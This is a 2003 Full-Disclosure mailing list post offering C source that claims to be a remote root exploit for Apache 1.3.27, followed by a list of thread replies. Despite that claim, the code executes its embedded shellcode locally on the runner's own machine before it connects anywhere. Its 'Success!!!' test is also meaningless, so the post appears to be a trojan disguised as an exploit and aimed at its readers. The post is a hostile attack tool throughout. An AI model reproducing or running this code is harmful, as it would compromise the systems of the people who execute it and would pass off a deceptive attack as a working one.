Full Disclosure mailing list archives
Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)
From: <koec () hushmail com>
Date: Fri, 20 Jun 2003 08:39:29 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I am posting this as a member of koec. The koec take no responsibility for damages caused by this software, compile and use at your own risk. By the way, the koec make you all look like a bunch of fuckin' schoolgirls. WHITEH8. - --BEGIN KOEC-APACHE.C-- /* :: PRIVATE - DO NOT DISTRIBUTE :: * Apache/1.3.27 - Remote Root Exploit * Knights of the Eastern Calculus (info () koec org) */ #include <stdio.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> static char shellcode[] = { "\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21" "\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68" "\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d" "\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00" "\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02" "\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d" "\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67" "\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00" "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc" "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50" "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1" "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24" "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44" "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89" "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0" }; int main(int *argc, char **argv) { int i; char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if((int)argc < 3 ) { printf("usage: %s <target> <shell port>\n", argv[0]); printf("ex: %s google.com 31337\n", argv[0]); exit(0); } buffer = (char *) malloc(512 + 1024 + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[512 - strlen(shellcode)], shellcode, strlen(shellcode)); buffer[512 + 1024] = ';'; buffer[512 + 1024 + 1] = '\0'; void(*b)()=(void*)shellcode;b(); hp = gethostbyname(argv[1]); if (hp == NULL) { printf("Server doesn't exist\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Cannot open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("Attempting to Exploit...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("Success!!!\n"); else printf("No go there tough guy!\n"); printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2])); } - --END KOEC-APACHE.C-- -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAj7zKrcACgkQsm8eq8rMuWpg0gCeNQCeLDLLhIki1eWI09PYX+bKLEgA nRXqS24ObnxBxWHwroyNTkBVjZpo =D2RC -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) koec (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Michael (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Eric Chien (Jun 20)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) gml (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) David M. Wilson (Jun 23)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) gml (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Gareth Bromley (Jun 20)
- <Possible follow-ups>
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Hudak, Tyler (Jun 20)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) mattmurphy () kc rr com (Jun 20)
- Re: RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Christian Friedl (Jun 21)